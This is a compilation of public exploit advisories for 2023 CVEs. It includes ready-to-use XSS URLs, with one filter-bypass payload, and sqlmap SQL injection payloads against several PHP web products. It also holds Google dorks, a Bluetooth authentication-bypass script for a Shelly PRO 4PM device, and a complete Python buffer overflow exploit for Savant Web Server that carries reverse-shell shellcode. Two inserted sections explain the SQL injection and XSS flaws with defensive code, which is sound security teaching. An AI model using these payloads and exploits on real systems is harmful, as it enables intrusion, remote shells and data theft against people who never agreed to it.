<pre><code># Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting<br /># Date: 2023.Aug.01<br /># Exploit Author: Pedro (ISSDU TW)<br /># Vendor Homepage: https://loganalyzer.adiscon.com/<br /># Software Link: https://loganalyzer.adiscon.com/download/<br /># Version: v4.1.13 and before<br /># Tested on: Linux<br /># CVE : CVE-2023-36306<br /><br />There are several installation methods.<br />If LogAnalyzer was installed without a database (file-based), no login is needed.<br />If it was installed with a database, you must log in as at least a read-only user.<br /><br />XSS payloads are as below:<br /><br />XSS<br />http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E<br />http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123<br />http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E<br />http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br />http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E<br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass<br /># Google Dork: NA<br /># Date: 2nd August 2023<br /># Exploit Author: The Security Team [exploitsecurity.io]<br /># Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability<br /># Vendor Homepage: https://www.shelly.com/<br /># Software Link: NA<br /># Version: Firmware v0.11.0 (REQUIRED)<br /># Tested on: MacOS/Linux<br /># CVE : CVE-2023-33383<br /><br />IFS=<br />failed=false<br />RED="\e[31m"<br />GREEN="\e[92m"<br />WHITE="\e[97m"<br />ENDCOLOR="\e[0m"<br />substring="Connection refused"<br /># Bluetooth address of the device used for testing<br />TARGET="c8:f0:9e:88:92:3e"<br /><br />banner()<br />{<br />    clear<br />    echo -e "${GREEN}[+]*********************************************************[+]"<br />    echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |"<br />    echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |"<br />    echo -e "${GREEN}| CVE: CVE-2023-33383 |"<br />    echo -e "${GREEN}[+]*********************************************************[+]"<br />    echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"<br />}<br /><br />banner<br />read -s -n 1 key<br />if [ "$key" = "x" ]; then<br />    exit 0<br />elif [ "$key" = "" ]; then<br />    # Discover primary services first; an empty result means the device did not answer<br />    gattout=$(sudo timeout 5 gatttool -b "$TARGET" --primary)<br />    if [ -z "$gattout" ]; then<br />        echo -e "${RED}Connection timed out${ENDCOLOR}"<br />        exit 1<br />    fi<br /><br />    # Enable notifications on the characteristic; check gatttool's own exit status, not sleep's<br />    sudo gatttool -b "$TARGET" --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1<br />    rc=$?<br />    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"<br />    sleep 1<br />    if [ $rc -ne 0 ]; then<br />        failed=true<br />        exit 1<br />    fi<br /><br />    sudo gatttool -b "$TARGET" --char-write-req -a 0x0008 -n ab >/dev/null 2>&1<br />    rc=$?<br />    sleep 1<br />    if [ $rc -ne 0 ]; then<br />        failed=true<br />        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"<br />        exit 1<br />    fi<br /><br />    sudo gatttool -b "$TARGET" --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1<br />    sleep 1<br />    for i in {1..5}<br />    do<br />        echo -ne "${GREEN}."<br />        sleep 1<br />    done<br />    echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"<br />fi<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Web Portal People CMS v2.8 URL redirection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : webportalpeople.com ~ ourclassonline.com |<br />| # Dork : intext:''To obtain a site like this for your class visit www.ourclassonline.com.'' |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : /chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L<br /><br />[+] http://wths1958com/chat/chat/input.php3?D=10&From=https://cxsecurity.com/author/indoushka/1/&L=english&N=20&NT=1&O=1&PWD_Hash=32cc5886dc1fa8c106a02056292c4654&R=Default&ST=1&T=1&U=1&Ver=L<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Web Stock v3.0 Unauthorised Administrative Access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://webstock.co.in/ |<br />| # Dork : Designed by Web Stock |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Allows viewing the administrative interface.<br /><br />[+] use payload : /admin/admin-menu.php<br /><br />[+] http://lbcjagrancom/admin/admin-menu.php<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code># Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: adivaha - Travel Tech Company<br /># Vendor Homepage: https://www.adivaha.com/<br /># Software Link: https://wordpress.org/plugins/adiaha-hotel/<br /># Demo: https://www.adivaha.com/demo/adivaha-online/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data and modification of data,<br />and can crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /mobile-app/v3/<br /><br />GET parameter 'pid' is vulnerable to SQL Injection<br /><br />https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot<br /><br />---<br />Parameter: pid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Bus Reservation System 1.1 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 20/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/bus-reservation-system/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4111<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data and modification of data,<br />and can crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /index.php<br /><br />GET parameter 'pickup_id' is vulnerable to SQL Injection<br /><br />https://website/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=[SQLi]&session_id=<br /><br /><br />---<br />Parameter: pickup_id (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&session_id=<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3 AND 07569=7569&session_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=3) AND IF(now()=sysdate(),SLEEP(5),0)-- wXyW&session_id=<br />---<br /><br /><br />[-] Done<br /></code></pre>
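Both SQL injection findings above (the adivaha `pid` parameter and the PHPJabbers `pickup_id` parameter) are the same defect: a numeric GET parameter concatenated straight into a query. The added example below is not code from either vendor; it uses a constructed in-memory SQLite table and the boolean-based probe from the sqlmap output to show why the concatenated query is an oracle and why type validation plus parameter binding closes it.

```python
import sqlite3


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a booking system's pickup locations."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE locations (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO locations VALUES (?, ?)",
                   [(1, "Airport"), (2, "Central Station"), (3, "Harbour")])
    return db


def get_locations_vulnerable(db: sqlite3.Connection, pickup_id: str) -> list:
    """The bug class in the advisory: the untrusted parameter becomes part of the SQL text,
    so an appended condition is evaluated by the database instead of being compared."""
    sql = "SELECT name FROM locations WHERE id = " + pickup_id
    return [row[0] for row in db.execute(sql)]


def get_locations_fixed(db: sqlite3.Connection, pickup_id: str) -> list:
    """Hardened form: reject anything that is not an integer, then bind the value.
    A bound parameter is data only and can never change the query's structure."""
    try:
        pid = int(pickup_id)
    except ValueError:
        return []
    rows = db.execute("SELECT name FROM locations WHERE id = ?", (pid,))
    return [row[0] for row in rows]


# The boolean-based probe quoted in the sqlmap output above.
PAYLOAD = "3 AND 07569=7569"

if __name__ == "__main__":
    db = demo_db()
    # Vulnerable: the probe returns the same row as the plain id 3, which is
    # exactly the true/false signal a blind injection relies on.
    print("concatenated:", get_locations_vulnerable(db, "3"), get_locations_vulnerable(db, PAYLOAD))
    # Fixed: the probe fails validation and no query is run with it.
    print("parameterised:", get_locations_fixed(db, "3"), get_locations_fixed(db, PAYLOAD))
```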
<pre><code># Exploit Title: Academy LMS 6.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: Creativeitem<br /># Vendor Homepage: https://creativeitem.com/<br /># Software Link: https://demo.creativeitem.com/academy/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4119<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message,<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /academy/home/courses<br /><br />GET parameter 'query' is vulnerable to XSS<br /><br />https://website/academy/home/courses?query=[XSS]<br /><br /><br />Path: /academy/home/courses<br /><br />GET parameter 'sort_by' is vulnerable to XSS<br /><br />https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS]<br /><br /><br />XSS payloads (blocked by the filter):<br /><br />&lt;script&gt;alert(1)&lt;/script&gt;<br />ldt4d"&gt;&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt;nuydd<br /><br /><br />XSS payload that bypasses the filter:<br /><br />cplvz"&gt;&lt;img src=a onerror=alert(1)&gt;fk4ap<br /><br /><br />[-] Done<br /></code></pre>
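The advisory shows a blocklist that stops `&lt;script&gt;` but not an `&lt;img onerror&gt;` handler, which is the usual failure of filtering on tag names. The added example below is not Academy LMS code: it pairs a hypothetical blocklist sanitizer with context-aware output encoding, reflects the advisory's three payloads through a constructed page template, and uses Python's HTML parser to report whether any tag beyond the template's own survived and whether the reflected value still round-trips intact.

```python
import html
import re
from html.parser import HTMLParser

# Hypothetical blocklist sanitizer (constructed, not the vendor's code):
# strips <script> tags and reflects everything else verbatim.
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def blocklist_filter(value: str) -> str:
    return SCRIPT_TAG.sub("", value)


def encode_for_html(value: str) -> str:
    """Fix: entity-encode & < > " ' so reflected data can never become markup."""
    return html.escape(value, quote=True)


def render(query: str, sanitizer) -> str:
    """Constructed template reflecting 'query' into an attribute and an element body."""
    safe = sanitizer(query)
    return f'<input name="query" value="{safe}"><h2>Results for {safe}</h2>'


class _Audit(HTMLParser):
    """Record every start tag and the attribute value a browser would see for the input."""
    def __init__(self):
        super().__init__()
        self.tags, self.query_value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.query_value = dict(attrs).get("value")


TEMPLATE_TAGS = ("input", "h2")


def audit(query: str, sanitizer):
    """Return (value_round_trips, injected_tags); a safe reflection yields (True, [])."""
    parser = _Audit()
    parser.feed(render(query, sanitizer))
    injected = [t for t in parser.tags if t not in TEMPLATE_TAGS]
    return parser.query_value == query, injected


# The three payloads listed in the advisory above.
PAYLOADS = [
    "<script>alert(1)</script>",
    'ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd',
    'cplvz"><img src=a onerror=alert(1)>fk4ap',
]
```

Running `audit(p, blocklist_filter)` over the payloads shows the third one injecting an `img` tag in both reflection contexts, while `audit(p, encode_for_html)` returns `(True, [])` for all three.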
<pre><code># Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)<br /># Date: [30/07/2023]<br /># Exploit Author: [0xBOF90]<br /># Vendor Homepage: [link]<br /># Version: [app version] (3.1)<br /># Tested on: [Windows 10]<br /><br />import socket<br /><br />try:<br />    server = "192.168.56.102"<br />    # bad characters: \x00\x0a\x0d\x25<br />    port = 80<br />    size = 253<br />    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25"<br />    buf = b""<br />    buf += b"\xdb\xc0\xd9\x74\x24\xf4\xbf\x57\xe2\x90\xa0\x58"<br />    buf += b"\x31\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x2f"<br />    buf += b"\xf1\x72\x55\x33\x1d\xf0\x96\xcb\xde\x95\x1f\x2e"<br />    buf += b"\xef\x95\x44\x3b\x40\x26\x0e\x69\x6d\xcd\x42\x99"<br />    buf += b"\xe6\xa3\x4a\xae\x4f\x09\xad\x81\x50\x22\x8d\x80"<br />    buf += b"\xd2\x39\xc2\x62\xea\xf1\x17\x63\x2b\xef\xda\x31"<br />    buf += b"\xe4\x7b\x48\xa5\x81\x36\x51\x4e\xd9\xd7\xd1\xb3"<br />    buf += b"\xaa\xd6\xf0\x62\xa0\x80\xd2\x85\x65\xb9\x5a\x9d"<br />    buf += b"\x6a\x84\x15\x16\x58\x72\xa4\xfe\x90\x7b\x0b\x3f"<br />    buf += b"\x1d\x8e\x55\x78\x9a\x71\x20\x70\xd8\x0c\x33\x47"<br />    buf += b"\xa2\xca\xb6\x53\x04\x98\x61\xbf\xb4\x4d\xf7\x34"<br />    buf += b"\xba\x3a\x73\x12\xdf\xbd\x50\x29\xdb\x36\x57\xfd"<br />    buf += b"\x6d\x0c\x7c\xd9\x36\xd6\x1d\x78\x93\xb9\x22\x9a"<br />    buf += b"\x7c\x65\x87\xd1\x91\x72\xba\xb8\xfd\xb7\xf7\x42"<br />    buf += b"\xfe\xdf\x80\x31\xcc\x40\x3b\xdd\x7c\x08\xe5\x1a"<br />    buf += b"\x82\x23\x51\xb4\x7d\xcc\xa2\x9d\xb9\x98\xf2\xb5"<br />    buf += b"\x68\xa1\x98\x45\x94\x74\x0e\x15\x3a\x27\xef\xc5"<br />    buf += b"\xfa\x97\x87\x0f\xf5\xc8\xb8\x30\xdf\x60\x52\xcb"<br />    buf += b"\x88\x4e\x0b\xeb\x2d\x27\x4e\x0b\xab\x8e\xc7\xed"<br />    buf += b"\xd9\xe0\x81\xa6\x75\x98\x8b\x3c\xe7\x65\x06\x39"<br />    buf += b"\x27\xed\xa5\xbe\xe6\x06\xc3\xac\x9f\xe6\x9e\x8e"<br />    buf += b"\x36\xf8\x34\xa6\xd5\x6b\xd3\x36\x93\x97\x4c\x61"<br />    buf += b"\xf4\x66\x85\xe7\xe8\xd1\x3f\x15\xf1\x84\x78\x9d"<br />    buf += b"\x2e\x75\x86\x1c\xa2\xc1\xac\x0e\x7a\xc9\xe8\x7a"<br />    buf += b"\xd2\x9c\xa6\xd4\x94\x76\x09\x8e\x4e\x24\xc3\x46"<br />    buf += b"\x16\x06\xd4\x10\x17\x43\xa2\xfc\xa6\x3a\xf3\x03"<br />    buf += b"\x06\xab\xf3\x7c\x7a\x4b\xfb\x57\x3e\x6b\x1e\x7d"<br />    buf += b"\x4b\x04\x87\x14\xf6\x49\x38\xc3\x35\x74\xbb\xe1"<br />    buf += b"\xc5\x83\xa3\x80\xc0\xc8\x63\x79\xb9\x41\x06\x7d"<br />    buf += b"\x6e\x61\x03"<br /><br />    # xor ecx, ecx; test ecx, ecx; je 0x17<br />    httpMethod = b"\x31\xC9\x85\xC9\x0F\x84\x11" + b" /"<br /><br />    egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"<br />    egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"<br />    egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"<br />    egghunter += b"\xff\xe7"<br /><br />    inputBuffer = b"\x90" * 10 + egghunter<br />    inputBuffer += b"\x41" * (size - len(egghunter) - 10)<br />    inputBuffer += b"\x74\x86\x41"  # 0x00418674<br />    httpEndRequest = b"\r\n\r\n"<br />    shellcode = b"w00tw00t" + buf<br />    buf = httpMethod + inputBuffer + httpEndRequest + shellcode<br />    print("Sending evil buffer...")<br />    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />    s.connect((server, port))<br />    s.send(buf)<br />    s.close()<br /><br />    print("Done!")<br /><br />except socket.error:<br />    print("Could not connect!")<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Rental Property Booking 2.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/rental-property-booking-calendar/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4117<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message,<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 22/07/2023<br /># Vendor: PHPJabbers<br /># Vendor Homepage: https://www.phpjabbers.com/<br /># Software Link: https://www.phpjabbers.com/taxi-booking-script/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /># CVE: CVE-2023-4116<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message,<br />and can then perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to RXSS<br /><br />https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS]<br /><br /><br />[-] Done<br /></code></pre>